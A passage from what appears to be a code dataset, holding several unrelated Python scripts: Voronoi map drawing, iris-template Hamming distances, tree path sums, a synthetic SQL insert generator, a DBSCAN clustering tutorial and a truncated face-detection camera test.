hstack((x,bary.Pos[0][0]))\r\n y = hstack((y,bary.Pos[0][1]))\r\n try 
:\r\n x = hstack((x,x[0]))\r\n y = hstack((y,y[0]))\r\n ax.plot(x,y)\r\n except :\r\n print('x = %s, y = %s' %(x,y))\r\n\r\n\r\n\r\n elif affichage == 'Polygone' :\r\n nverts = len(delau_point.Bary)+1\r\n verts = empty((0,2))\r\n for bary in delau_point.Bary :\r\n verts = vstack((verts,bary.Pos))\r\n try :\r\n## if 1 :\r\n verts = vstack((verts,verts[0,:]))\r\n verts[verts[:,0]<=0,0] = 0\r\n verts[verts[:,1]<=0,1] = 0\r\n verts[verts[:,0]>size_grid,0] = size_grid\r\n verts[verts[:,1]>size_grid,1] = size_grid\r\n codes = ones(nverts, int) * Path.LINETO\r\n codes[0] = Path.MOVETO\r\n codes[nverts-1] = Path.CLOSEPOLY\r\n path = Path(verts, codes)\r\n ind = delau_point.indice\r\n arg_color = delaunay.rand_pts[ind]\r\n if arg_color[0]<0 : arg_color[0] = 0\r\n if arg_color[1]<0 : arg_color[1] = 0\r\n color = gcfm.get_color(arg_color)\r\n patch = patches.PathPatch(path, facecolor=color, edgecolor='none')\r\n ax.add_patch(patch)\r\n except :\r\n print('!!!!!!!!!! attention !!!!!!!!!!! \\n poly_position= %s' %verts)\r\n\r\n\r\n\r\n\r\n elif affichage == 'Polygone2' :\r\n\r\n point_water_array = empty((0,2))\r\n for point in delaunay.Liste :\r\n arg_color = delaunay.rand_pts[point.indice]\r\n if arg_color[0]<0 :\r\n arg_color[0] = 0\r\n if arg_color[1]<0 :\r\n arg_color[1] = 0\r\n\r\n # define water of point\r\n point.water = gcfm.iswater(arg_color)\r\n## print('water : ' + str(point.water))\r\n if point.water == 0 :\r\n point_water_array = vstack((point_water_array,arg_color))\r\n\r\n for point in delaunay.Liste :\r\n for bary in point.Bary :\r\n if bary.pos[0][0] < 0 : bary.pos[0][0] = 0\r\n if bary.pos[0][1] < 0 : bary.pos[0][1] = 0\r\n if bary.pos[0][0] > size_grid : bary.pos[0][0] = size_grid\r\n if bary.pos[0][1] > size_grid : bary.pos[0][1] = size_grid\r\n\r\n dist_from_ocean = sqrt(amin((point_water_array[:,0]-bary.pos[0][0])**2 + \\\r\n (point_water_array[:,1]-bary.pos[0][1])**2))\r\n bary.altitude = dist_from_ocean\r\n\r\n\r\n delaunay, max_altitude = norm_altitude(delaunay)\r\n show_polygones(delaunay, size_grid, gcfm)\r\n\r\n plt.xlim([0,size_grid])\r\n plt.ylim([0,size_grid])\r\n plt.show()\r\n\r\n plt.pause(60)\r\n fichier_nom = (\"fichier_delaunay%sx%s.txt\" %(size_grid, size_grid))\r\n mon_fichier = open(fichier_nom, \"w\")\r\n with open('donnees', 'wb') as fichier:\r\n mon_pickler = pickle.Pickler(fichier)\r\n mon_pickler.dump(delaunay)\r\n\r\n ##\r\n ##with open('donnees', 'rb') as fichier:\r\n ## mon_depickler = pickle.Unpickler(fichier)\r\n ## data = mon_depickler.load()\r\n\r\n\r\n\r\n\r\ndef show_polygones(delaunay, size_grid, gcfm) :\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n for point in delaunay.Liste :\r\n nverts = len(point.Bary)+1\r\n verts = empty((0,2))\r\n for bary in point.Bary :\r\n verts = vstack((verts,bary.pos))\r\n try :\r\n## if 1 :\r\n verts = vstack((verts,verts[0,:]))\r\n\r\n # modifie point hors zone\r\n verts[verts[:,0]<=0,0] = 0\r\n verts[verts[:,1]<=0,1] = 0\r\n verts[verts[:,0]>size_grid,0] = size_grid\r\n verts[verts[:,1]>size_grid,1] = size_grid\r\n\r\n # definition du polygone\r\n codes = ones(nverts, int) * Path.LINETO\r\n codes[0] = Path.MOVETO\r\n codes[nverts-1] = Path.CLOSEPOLY\r\n path = Path(verts, codes)\r\n\r\n couleur = gcfm.get_color2(point)\r\n\r\n # plot\r\n patch = patches.PathPatch(path, facecolor=couleur, edgecolor='none')\r\n ax.add_patch(patch)\r\n except :\r\n print('!!!!!!!!!! attention !!!!!!!!!!! 
\\n poly_position= %s' %verts)\r\n plt.show()\r\n\r\n\r\ndef norm_altitude(delaunay) :\r\n max_altitude = 0\r\n for point in delaunay.Liste :\r\n for bary in point.Bary :\r\n if bary.altitude > max_altitude :\r\n max_altitude = bary.altitude\r\n for point in delaunay.Liste :\r\n for bary in point.Bary :\r\n bary.altitude = bary.altitude/(max_altitude)\r\n## print(bary.altitude)\r\n return delaunay, max_altitude\r\n\r\n\r\n\r\nif __name__ == '__main__' :\r\n delaunay = main_voronoi()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"DelaunayMappGeneration/voronoi_generation.py","file_name":"voronoi_generation.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155793014","text":"import os\nimport cv2 as cv\nimport numpy as np\nfrom tqdm import tqdm\nfrom time import time\nimport pickle\nfrom itertools import combinations, repeat\nfrom sklearn.preprocessing import LabelBinarizer\nfrom multiprocessing import Pool, cpu_count\n\nfrom fnc.encode import encode\n\n# --------------------------------------------------------------------------\n# Parameters\n# --------------------------------------------------------------------------\nDATA_PATH = '/home/dl/wangleyuan/dataset/CASIA-Iris-Thousand'\nLESS_FLAG = False\n# DATA_PATH = 'E:/Dataset/CASIA-Iris-Lamp'\n# LESS_FLAG = True\nTEMP_DIR = './feature/'\n\n# Feature encoding parameters\nminWaveLength = 18\nmult = 1\nsigmaOnf = 0.5\n\n\n##-----------------------------------------------------------------------------\n## Function\n##-----------------------------------------------------------------------------\ndef calHammingDist(template1, template2):\n # Initialize\n hd = np.nan\n\n # Shift template left and right, use the lowest Hamming distance\n for shifts in range(-8, 9):\n template1s = shiftbits(template1, shifts)\n\n totalbits = template1s.size\n\n hd1 = np.logical_xor(template1s, template2).sum() / template1s.size\n\n if hd1 < hd or np.isnan(hd):\n hd = hd1\n\n return hd\n\n\ndef shiftbits(template, noshifts):\n # Initialize\n templatenew = np.zeros(template.shape)\n width = template.shape[1]\n s = 2 * np.abs(noshifts)\n p = width - s\n\n # Shift\n if noshifts == 0:\n templatenew = template\n\n elif noshifts < 0:\n x = np.arange(p)\n templatenew[:, x] = template[:, s + x]\n x = np.arange(p, width)\n templatenew[:, x] = template[:, x - p]\n\n else:\n x = np.arange(s, width)\n templatenew[:, x] = template[:, x - s]\n x = np.arange(s)\n templatenew[:, x] = template[:, p + x]\n\n return templatenew\n\n\ndef getHmdistMat(features):\n num_feature = features.shape[0]\n hm_dists = np.zeros((num_feature, num_feature))\n pairs = [x for x in combinations([y for y in range(num_feature)], 2)]\n for x, y in tqdm(pairs, ncols=75, ascii=True):\n hm_dists[x, y] = calHammingDist(features[x, :, :], features[y, :, :])\n\n hm_dists = hm_dists + hm_dists.T\n\n return hm_dists\n\n\ndef getfeaturs(img_names, mask, size=(70, 1080)):\n features = np.zeros((len(img_names), size[0], size[1]), dtype=np.bool)\n for idx in tqdm(range(len(img_names)), ncols=75, ascii=True):\n img = cv.imread(os.path.join(DATA_PATH, 'NormIm', img_names[idx]), 0)\n features[idx, :, :], _ = encode(img, mask, minWaveLength, mult,\n sigmaOnf)\n return features\n\n\n# --------------------------------------------------------------------------\n# Execution\n# --------------------------------------------------------------------------\nif __name__ == \"__main__\":\n 
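# pipeline: load the test protocol, encode iris templates, compute pairwise Hamming distances, and pickle the results\n    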
print(DATA_PATH)\n # Check the existence of temp_dir\n ft_path = os.path.join(TEMP_DIR, DATA_PATH.split('/')[-1] + '_shift.pkl')\n\n # read protocol\n start = time()\n img_names = []\n labels = []\n with open(os.path.join(DATA_PATH, 'test.txt'), 'r') as f:\n for line in f.readlines():\n tmp = line.strip().split(' ')\n img_names.append(tmp[0])\n labels.append(tmp[1])\n if LESS_FLAG:\n img_names = img_names[:15]\n labels = labels[:15]\n onehot = LabelBinarizer().fit_transform(labels)\n\n end = time()\n print('\\n>>> Loading time: {} [s]\\n'.format(end - start))\n start = end\n\n # encoding\n mask = np.zeros((70, 540)).astype(np.bool)\n features = getfeaturs(img_names, mask, (70, 1080))\n\n end = time()\n print('\\n>>> Encoding time: {} [s]\\n'.format(end - start))\n start = end\n\n # mask = np.zeros((70, 1080)).astype(np.bool)\n hm_dists = getHmdistMat(features)\n\n end = time()\n print('\\n>>> calHammingDist time: {} [s]\\n'.format(end - start))\n\n ft_load = {\n 'onehot': onehot,\n 'features': features.reshape(len(img_names), -1),\n 'labels': labels,\n 'hm_dists': hm_dists\n }\n if not LESS_FLAG:\n with open(ft_path, 'wb') as f:\n pickle.dump(ft_load, f)\n","sub_path":"python/extraction.py","file_name":"extraction.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626015033","text":"\ndef print_all_k_sum_path_util(root, value, path=[]):\n if not root:\n return\n path.append(root.value)\n node_sum = 0\n for i in range(len(path)-1, -1, -1):\n node_sum += path[i]\n if node_sum == value:\n for j in range(i, len(path)):\n print(path[j], end = ' ')\n print('')\n\n left = print_all_k_sum_path_util(root.left, value, path)\n\n right = print_all_k_sum_path_util(root.right, value, path)\n path.pop()\n\n\n\n\ndef print_all_k_sum_path(root, value):\n print_all_k_sum_path_util(root, value)\n\nclass newNode:\n def __init__(self, data):\n # put in the data\n self.value = data\n self.left = self.right = None\n\nroot = newNode(1)\nroot.left = newNode(3)\nroot.left.left = newNode(2)\nroot.left.right = newNode(1)\nroot.left.right.left = newNode(1)\nroot.right = newNode(-1)\nroot.right.left = newNode(4)\nroot.right.left.left = newNode(1)\nroot.right.left.right = newNode(2)\nroot.right.right = newNode(5)\nroot.right.right.right = newNode(2)\n\nprint_all_k_sum_path(root, 5)\n","sub_path":"Python_Projects/6-Google codejam/038_print_all_k_sum_paths.py","file_name":"038_print_all_k_sum_paths.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"230230789","text":"'''\r\nCreated on 27 de ago de 2016\r\n\r\n@author: Max\r\n'''\r\nfrom random import random, seed\r\n\r\ndef atividades_profissionais_gen():\r\n seed(0)\r\n inputFile = open(\"cbo\", \"r\")\r\n cbo = 0\r\n for linha in inputFile:\r\n cbo += 1\r\n prof = linha[8:-1]\r\n tp_cbo_saude = 'NULL'\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ATIVIDADES_PROFISSIONAIS VALUES ('{0}', '{1}', {2});\r\n\"\"\"\r\n .format(cbo, prof, tp_cbo_saude))\r\n print(\"atividades_profissionais done\")\r\n \r\nestados = []\r\ndef estados_gen():\r\n seed(0)\r\n inputFile = open(\"estados\", \"r\")\r\n \r\n for linha in inputFile:\r\n uf = linha[-3:-1]\r\n estados.append(uf)\r\n estado = linha[:-4]\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ESTADOS VALUES ('{0}', '{1}');\r\n\"\"\"\r\n .format(uf, estado))\r\n print(\"estados done\")\r\n\r\ndef estabelecimentos_gen():\r\n 
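# generate 1000 synthetic establishments (ids, coordinates, addresses, contact info)\r\n    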
seed(0)\r\n for i in range(1, 1001):\r\n unidade_id = i\r\n cnes = 10000 + i \r\n latitude = 90 * random()\r\n longitude = 90 * random()\r\n cod_mun = int( 1000 * random() + 1)\r\n logradouro = \"Rua \" + str( i + 5000 )\r\n numero = 500 + int( random() * 1000 )\r\n complemento = \"NULL\" if random() < 0.07 else \"'{0}'\".format(int( random()*300 ))\r\n bairro = \"Bairro no.\" + str(i)\r\n cep = 90000000 + i*int((random()*10000))\r\n telefone = 5505130000000 + i*int((random()*10000))\r\n fax = 5505150000000 + i*int((random()*10000))\r\n email = \"hospital_\" + str(i) + \"@generico.com\"\r\n statusmov = \"NULL\"\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ESTABELECIMENTOS\r\nVALUES ('{0}', '{1}', {2}, {3}, '{4}', '{5}', '{6}', {7}, '{8}', '{9}', '{10}', '{11}', '{12}', {13});\r\n\"\"\"\r\n .format(unidade_id, cnes, latitude, longitude, cod_mun, logradouro, numero, complemento, bairro, cep, telefone, fax, email, statusmov))\r\n print(\"estabelecimentos done\")\r\n\r\ndef municipios_gen():\r\n seed(0)\r\n for i in range(1, 1001):\r\n uf = estados[i % len(estados)]\r\n nome_mun = \"Cidade no.\" + str(i)\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO MUNICIPIOS VALUES ('{0}', '{1}', '{2}');\r\n\"\"\"\r\n .format(i, uf, nome_mun))\r\n print(\"municipios done\")\r\n \r\ndef end_compl_estab_gen():\r\n seed(0)\r\n for end_compl_id in range(1, 301):\r\n i = int(1000 * random() + 1)\r\n unidade_id = i\r\n cod_mun = int( 1000 * random() )\r\n logradouro = \"Rua \" + str( i + 5000 )\r\n numero = 500 + int( random() * 1000 )\r\n complemento = \"\" if int( random()*1000 )%13 == 0 else int( random()*300 ) \r\n bairro = \"Bairro no.\" + str(i)\r\n cep = 90000000 + int((random()*9999999))\r\n ddd_tel = int(random() * 999)\r\n telefone = 5505130000000 + int((random()*9999999))\r\n ddd_fax = int(random() * 999)\r\n fax = 5505150000000 + int((random()*9999999))\r\n email = \"complemento_\" + str(i) + \"@generico.com\"\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO END_COMPL_ESTAB\r\nVALUES ('{0}', '{1}', '{2}', '{3}', '{4}', '{5}', '{6}', '{7}', '{8}', '{9}', '{10}', '{11}', '{12}');\r\n\"\"\"\r\n .format(end_compl_id, cod_mun, logradouro, numero, complemento, bairro, cep, ddd_tel, telefone, ddd_fax, fax, email, unidade_id))\r\n print(\"end_compl_estab done\")\r\n \r\ndef estab_horario_atend_gen():\r\n seed(0)\r\n estab_horario_atend_id = 0\r\n for unidade_id in range(1, 1001):\r\n for co_dia_semana in range(1, 8):\r\n estab_horario_atend_id += 1\r\n hr_inicio = str(int(12 * random())) + \":00\"\r\n hr_fim = str(int(12 + 12 * random())) + \":00\"\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ESTAB_HORARIOS_ATEND VALUES ('{0}', '{1}', '{2}', '{3}', '{4}');\r\n\"\"\"\r\n .format(estab_horario_atend_id, unidade_id, co_dia_semana, hr_inicio, hr_fim))\r\n print(\"estab_horario_atend_gen done\")\r\n \r\ndef tipos_de_atendimento_gen():\r\n seed(0)\r\n for co_atend_prestado in range(0, 100):\r\n descricao = \"Descricao \" + str(co_atend_prestado)\r\n categoria = 'c' if random() < 0.33 else ('e' if random() < 0.66 else 'p')\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO TIPOS_DE_ATENDIMENTO VALUES ('{0}', '{1}', '{2}');\r\n\"\"\"\r\n .format(co_atend_prestado, descricao, categoria) )\r\n print(\"tipos_de_atendimento_gen done\")\r\n\r\n \r\ndef tipos_atend_estab_gen():\r\n seed(0)\r\n id_tipos_atend_estab = 0\r\n for unidade_id in range(1, 1001):\r\n for co_atend_prestado in range(0, 100):\r\n if random() < 0.039:\r\n id_tipos_atend_estab += 1\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO 
TIPOS_ATEND_ESTAB VALUES ({0}, '{1}', '{2}');\r\n\"\"\"\r\n .format(id_tipos_atend_estab, unidade_id, co_atend_prestado))\r\n print(\"tipos_atend_estab_gen done\")\r\n \r\ndef usuarios_gen():\r\n seed(0)\r\n for id_usuario in range(1, 1001):\r\n telefone = 5505130000000 + int((random()*9999999))\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n rr = int(random() * 16)\r\n hh24 = int(random() * 23.99)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_cadastro = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO USUARIOS VALUES ({0}, {1}, {2});\r\n\"\"\"\r\n .format(id_usuario, telefone, ts_cadastro))\r\n print(\"usuarios_gen done\")\r\n \r\ndef pacientes_gen():\r\n seed(0)\r\n for id_paciente in range(1, 700):\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO PACIENTES VALUES ({0});\r\n\"\"\"\r\n .format(id_paciente))\r\n print(\"pacientes_gen done\")\r\n \r\ndef profissionais_gen():\r\n seed(0)\r\n for id_usuario in range(600, 1001):\r\n prof_id = str(10000 + id_usuario)\r\n cpf_prof = int(89999999999 * random()) + 10000000000\r\n nome_prof = \"Profissional \" + prof_id\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n yyyy = 1915 + int(random() * 100) \r\n data_nasc = \"TO_DATE ('{0}-{1}-{2}', 'DD-MM-YYYY')\".format(dd, mm, yyyy)\r\n sexo = \"m\" if random() < 0.5 else \"f\"\r\n statusmov = \"NULL\"\r\n no_email = \"profissional_\" + str(prof_id) + \"@generico.com\"\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO PROFISSIONAIS VALUES ({0}, '{1}', '{2}', '{3}', {4}, '{5}', '{6}', '{7}'); \r\n\"\"\"\r\n .format(id_usuario, prof_id, cpf_prof, nome_prof, data_nasc, sexo, statusmov, no_email))\r\n print(\"profissionais_gen done\")\r\n \r\ndef medicos_gen():\r\n seed(0)\r\n for id_medico in range(650, 901):\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO MEDICOS VALUES ({0}); \r\n\"\"\"\r\n .format(id_medico))\r\n print(\"medicos_gen done\")\r\n \r\ndef enderecos_gen():\r\n seed(0)\r\n id_enderecos = 0\r\n for id_paciente in range(1, 700):\r\n id_enderecos += 1\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n rr = int(random() * 16)\r\n hh24 = int(random() * 23.99)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_cadastro = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n logradouro = \"Rua \" + str( id_paciente + 5000 )\r\n numero = 500 + int( random() * 1000 )\r\n complemento = \"NULL\" if random() < 0.07 else \"'{0}'\".format(int( random()*300 ))\r\n bairro = \"Bairro no.\" + str(id_paciente)\r\n cod_cep = 90000000 + int((random()*9999999))\r\n \r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ENDERECOS\r\nVALUES ({0}, {1}, {2}, '{3}', '{4}', {5}, '{6}', '{7}');\r\n\"\"\" \r\n .format(id_enderecos, id_paciente, ts_cadastro, logradouro, numero, complemento, bairro, cod_cep))\r\n \r\n if(random() < 0.66):\r\n id_enderecos += 1\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n rr = int(random() * 16)\r\n hh24 = int(random() * 23.99)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_cadastro = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n logradouro = \"Rua \" + str( id_paciente + 5000 )\r\n numero = 500 + int( random() * 1000 )\r\n complemento = \"NULL\" if random() < 0.07 else \"'{0}'\".format(int( random()*300 ))\r\n bairro = \"Bairro no.\" + 
str(id_paciente)\r\n cod_cep = 90000000 + int((random()*9999999))\r\n \r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ENDERECOS\r\nVALUES ({0}, {1}, {2}, '{3}', '{4}', {5}, '{6}', '{7}');\r\n\"\"\" \r\n .format(id_enderecos, id_paciente, ts_cadastro, logradouro, numero, complemento, bairro, cod_cep))\r\n print(\"enderecos_gen done\")\r\n \r\ndef atendimentos_gen():\r\n for id_atendimento in range(1, 2001):\r\n co_atend_prestado = int(99.99*random())\r\n id_medico = 650 + int(random()*250.99)\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n rr = int(random() * 1.99) + 15\r\n hh24 = int(random() * 12)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_inicio = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n \r\n hh24 = int(random() * 12 + 10)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_fim = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n\r\n descricao = \"Descricao de atendimento no.\" + str(id_atendimento) \r\n id_paciente = int(random()*698.99 + 1)\r\n while id_paciente == id_medico:\r\n \tid_paciente = int(random()*698.99 + 1)\r\n unidade_id = int(random()*999.99 + 1)\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ATENDIMENTOS\r\nVALUES ({0}, '{1}', {2}, {3}, {4}, '{5}', {6}, '{7}');\r\n\"\"\" \r\n .format(id_atendimento, co_atend_prestado, id_medico, ts_inicio, ts_fim, descricao, id_paciente, unidade_id))\r\n print(\"atendimentos_gen done\")\r\n \r\ndef prof_estab_gen():\r\n\tseed(0)\r\n\tfor id_prof_estab in range(1, 1001):\r\n\t\tunidade_id = 1 + int(999*random())\r\n\t\tid_usuario = 600 + int(random()*400.99)\r\n\t\tcod_cbo = int(999.99*random()) + 1\r\n\t\tsql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO PROF_ESTAB VALUES ({0}, '{1}', {2}, '{3}');\r\n\"\"\"\r\n\t\t.format(id_prof_estab, unidade_id, id_usuario, cod_cbo))\r\n\tprint(\"prof_estab_gen done\")\r\n\r\n#sql_inserts = open(\"sql_inserts\", \"w\")\r\n\r\nfuncoes = [ estados_gen, municipios_gen, estabelecimentos_gen, estab_horario_atend_gen,\r\nend_compl_estab_gen, atividades_profissionais_gen, tipos_de_atendimento_gen,\r\ntipos_atend_estab_gen, usuarios_gen, pacientes_gen, profissionais_gen,\r\nmedicos_gen, enderecos_gen, atendimentos_gen, prof_estab_gen]\r\n\r\nfor i, func in enumerate(funcoes):\r\n\tprint(\"insert{:02d}.sql\".format(i))\r\n\tsql_inserts = open(\"insert{:02d}.sql\".format(i), \"w\")\r\n\tfunc()\r\n\tsql_inserts.close()\r\n\r\n#print(funcoes)\r\n#sql_inserts.close()\r\nprint(\"all done!\")","sub_path":"sqlgen/sqlscripts/SQLInserts.py","file_name":"SQLInserts.py","file_ext":"py","file_size_in_byte":11013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"142216915","text":"# 밀도기반 군집 기법\n# 계층적 군집 분석은 비슷한 군집끼리 묶여가며 최종적으로는 하나의 큰 군집이 될 때까지 그룹핑하는 군집 기법임.\n# 반면, 밀도기반 군집은 점이 세밀하게 몰려있어 밀도가 높은 부분을 군집으로 묶는 기법\n# kmeans와는 달리 군집의 수를 지정x\n# 원 / 달 모양처럼 불특정한 형태의 데이터도 군집 가능\n# 또한, 군집을 시행하면서 노이즈데이터도 분류 가능.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport math\n\nfrom matplotlib import cm\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.datasets import make_blobs, make_moons, make_circles\nfrom sklearn.metrics import silhouette_score, confusion_matrix, silhouette_samples, accuracy_score\n\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\n\nfrom scipy.cluster.hierarchy import linkage\nfrom scipy.cluster.hierarchy import dendrogram\nfrom 
scipy.cluster.hierarchy import fcluster\nimport mglearn\n\n\n# dbscan 작동원리\n# eps : 대상 포인트를 기준으로 군집으로 포함시킬 영역크기\n# 즉, 어느 점을 기준으로 반경 x내에 점이 y개 존재한다면, 이 모두를 하나의 군집으로 인식\n\n# core point :\n# border point :\n# noise point :\nfrom sklearn.preprocessing import StandardScaler\n\nmglearn.plots.plot_dbscan()\nplt.show()\n\n# wholesale 데이터로 dbscan 분석 시도\n# 도매유통업체 440명의 고객 연간구매 데이터\n# 채널, 지역, 채소류, 우유, 식료품, 냉동, 세제, 제과류\n\nwsales = pd.read_csv('c:/Java/data/wholesale.csv')\nwsales.drop(['Channel', 'Region'], axis = 1, inplace=True) #채널, 지역 열 삭제\nprint(wsales.head())\n\n#식료품, 우유 연간 지출 분석\nX = wsales[['Grocery', 'Milk']]\nplt.scatter(X['Grocery'],X['Milk'])\nplt.show()\n\n# 단위가 너무 크므로 적절한 크기(평균 0, 분산1)로 정규화 실시\nX = X.as_matrix().astype('float32', copy = False)\nscaler = StandardScaler().fit(X)\nX = scaler.transform(X)\n\nplt.scatter(X[:, 0], X[:, 1])\nplt.xlabel('Grocery')\nplt.ylabel('Milk')\nplt.show()\n\n# 식료품 구매시 우유도 함께 구매하는 양의 상관관계 보임\n\n# DBScan을 이용한 군집 시도\ndbscan = DBSCAN(eps=1.0, min_samples=15)\n# min_samples : 군집시도 최소 점의 개수\n# eps : 군집에 포함시킬 원의 반경.\n\ndbscan.fit(X)\nlabels =dbscan.labels_ # 군집여부 출력\ncore_sample =np.zeros_like(labels, dtype=bool) #440x2 행렬을 만듦\ncore_sample[dbscan.core_sample_indices_] = True\nprint(labels)\nprint(core_sample) # 군집여부를 True/False로 출력\n\n# 군집 결과 시각화\nunique_labels = np.unique(labels) #0, -1\ncolors = plt.cm.Spectral(np.linspace(0, 1, len(unique_labels)))\n\nfor (label, color) in zip(unique_labels, colors):\n class_member_mask = (labels == label)\n # 군집여부에 대한 실제 값을 조사하기 위해 전체 데이터에 대해 true/false 값을 조사\n # 1. (labels == label) => labels == 0 : xy\n # 2. (labels == label) => labels == -1 : xy2\n # 정상적으로 군집으로 포함된 점들 출력\n xy = X[class_member_mask & core_sample]\n plt.plot(xy[:,0], xy[:, 1], 'o', markerfacecolor=color, markersize=10)\n # 군집으로 포함되지 못한 점들 출력\n xy2 = X[class_member_mask & ~core_sample]\n plt.plot(xy2[:,0], xy2[:,1],'o', markerfacecolor=color, markersize=5)\n plt.ylabel('Grocery')\n plt.xlabel('Milk')\n plt.show()\n\n# 세제, 제과류 커럼에 대한 군집화\n#식료품, 우유 연간 지출 분석\nX = wsales[['Detergents_Paper', 'Delicassen']]\nplt.scatter(X['Detergents_Paper'],X['Delicassen'])\nplt.show()\n\n# 단위가 너무 크므로 적절한 크기(평균 0, 분산1)로 정규화 실시\nX = X.as_matrix().astype('float32', copy = False)\nprint(X)\nscaler = StandardScaler().fit(X)\nX = scaler.transform(X)\nplt.scatter(X[:, 0], X[:, 1])\nplt.xlabel('Detergents_Paper')\nplt.ylabel('Delicassen')\nplt.show()\n#세제 구매시 제과류를 구매하는 상관관계는 거의 없음.\n\n# DBScan을 이용한 군집 시도\ndbscan = DBSCAN(eps=1.0, min_samples=5, metric='euclidean')\ny_pred = dbscan.fit_predict(X)\n# min_samples : 군집시도 최소 점의 개수\n# eps : 군집에 포함시킬 원의 반경.\n\ndbscan.fit(X)\nlabels =dbscan.labels_ # 군집여부 출력\ncore_sample =np.zeros_like(labels, dtype=bool) #440x2 행렬을 만듦\ncore_sample[dbscan.core_sample_indices_] = True\nprint(labels)\nprint(core_sample) # 군집여부를 True/False로 출력\n\nfor (label, color) in zip(unique_labels, colors):\n class_member_mask = (labels == label)\n # 군집여부에 대한 실제 값을 조사하기 위해 전체 데이터에 대해 true/false 값을 조사\n # 1. (labels == label) => labels == 0 : xy\n # 2. 
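Before the wholesale data, a self-contained DBSCAN run on synthetic two-moon data makes the `eps`/`min_samples` roles and the `-1` noise label concrete (a sketch; scikit-learn assumed, as in the imports above):

```python
# Minimal DBSCAN illustration on synthetic data.
import numpy as np
from sklearn.cluster import DBSCAN
from sklearn.datasets import make_moons

X, _ = make_moons(n_samples=300, noise=0.05, random_state=0)
db = DBSCAN(eps=0.2, min_samples=5).fit(X)
labels = db.labels_                          # cluster id per point; -1 marks noise
n_clusters = len(set(labels)) - (1 if -1 in labels else 0)
core_mask = np.zeros_like(labels, dtype=bool)
core_mask[db.core_sample_indices_] = True    # True for core points only
print(n_clusters, int(np.sum(labels == -1))) # clusters found, noise count
```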
(labels == label) => labels == -1 : xy2\n # 정상적으로 군집으로 포함된 점들 출력\n xy = X[class_member_mask & core_sample]\n plt.plot(xy[:,0], xy[:, 1], 'o', markerfacecolor=color, markersize=10)\n # 군집으로 포함되지 못한 점들 출력\n xy2 = X[class_member_mask & ~core_sample]\n plt.plot(xy2[:,0], xy2[:,1],'o', markerfacecolor=color, markersize=5)\n plt.ylabel('Detergents_Paper')\n plt.xlabel('Delicassen')\n plt.show()","sub_path":"py1901/ML07d.py","file_name":"ML07d.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"366297935","text":"from fipu_face.fipu_face import *\n\n\n# Test the cropping in real time using the camera\n\ndef draw_predict_info(frame, msg):\n info = {'Message': str(msg)}\n\n # text_list = [k + ': '+ v for k,v in zip(info.keys(), info.values())]\n text_list = [v for k, v in zip(info.keys(), info.values())]\n\n height, width = frame.shape[:2]\n fontScale = width / 1000\n\n for i, line in enumerate(text_list):\n cv2.putText(frame, line, (10, (i + 1) * int(30 * fontScale)),\n cv2.FONT_HERSHEY_SIMPLEX, fontScale, COLOR_RED, 2)\n\n\ndef detect_on_img(frame):\n try:\n frame = detect(frame)\n\n return frame\n except ImageException as e:\n # print(e.get_error_codes())\n if e.image is not 